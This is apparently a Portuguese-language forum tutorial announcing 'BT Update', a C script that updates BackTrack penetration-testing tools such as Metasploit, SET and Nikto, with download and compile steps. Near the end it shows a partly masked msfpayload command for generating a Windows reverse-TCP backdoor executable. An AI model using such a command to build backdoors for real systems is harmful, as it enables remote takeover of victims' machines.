Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

BT Update

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial BT Update

    Introdução
    Uma grande necessidade para quem usa o BackTrack, é manter as suas ferramentas atualizadas pois são várias ferramentas integradas nesse ótimo sistema para pentest. Pensando nisso,resolvi criar um script capaz de atualizar as ferramentas de forma automática, você só precisa digitar qual a ferramenta você deseja atualizar e o script irá fazer a atualização da mesma de forma automática.

    Esta idéia não é totalmente minha, pois vi um script feito em python (.py) em uns sites americanos que tinha a mesma função do meu script, então como estou iniciando na linguagem C, achei uma ótima ideia refazer o script do meu gosto.

    Eu não iria destribuir o script livremente, mas como achei um programa legal e que podia ajudar muita gente, resolvi colocar no servidor da Security Hacker para qualquer pessoa usar.

    O programa está na sua primeira versão (1.0.0), mas logo irei acrescentar mais funcionalidades bem interessantes, tornando esse simples script em um tool-kit (caixa de ferramentas) que irá automatizar algumas de suas atividades.

    Quais os programas que o Script atualiza?
    Sim, são bem poucos, mas a cada nova versão, irei acrescentar algum programa novo. Os programas são:

    • Metasploit Framework
    • Exploit-db
    • SET
    • Aircrack e Airdrop
    • Giskimet
    • W3af
    • Nikto
    • Fimap
    • openVAS
    • FastTrack
    • SSLStrip
    • SickFuzz

    Como instalo o BTUpdate no meu BackTrack?
    Para instalar o BTUpdate em seu BT, é bastante simples, basta fazer o download do script:

    Código:
    wget http://www.securityhacker.org/projetos/2012/bt_update.c


    Em seguida, basta compilar o programa usando o seguinte comando:
    Código:
    # gcc bt_update.c -o bt_update


    Para rodar, use o comando:
    Código:
    ./bt_update


    Como faço pra instalar as novas versões do programa?
    Para facilitar a sua vida, você não precisa fazer todos os passos acima novamente, o programa tem uma opção no menu chamado: "8. Atualizar Script". Essa função, irá refazer os passos de instalação da ferramenta e atualiazar o script para sua nova versão.
    Versão atual: 1.0.0

    Quais são as proximas novidades?
    Estou pensando em criar funções que automatizam tarefas, usando as ferramentas do BackTrack. Como por exemplo, para você criar um Backdoor pelo Metasploit, você usa o comando:

    # msfpayload windows/.../reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx X > /root/Backdoor.exe

    Ps: O "x" é para os curiosos. rs

    Nas novas versões, o script irá fazer tudo para você. Caso você tenha alguma idéia ou reclamação (Bug), pode ficar a vontade para me escrever em:

    Jarlley.Ribeiro@live.com
X
Working...
X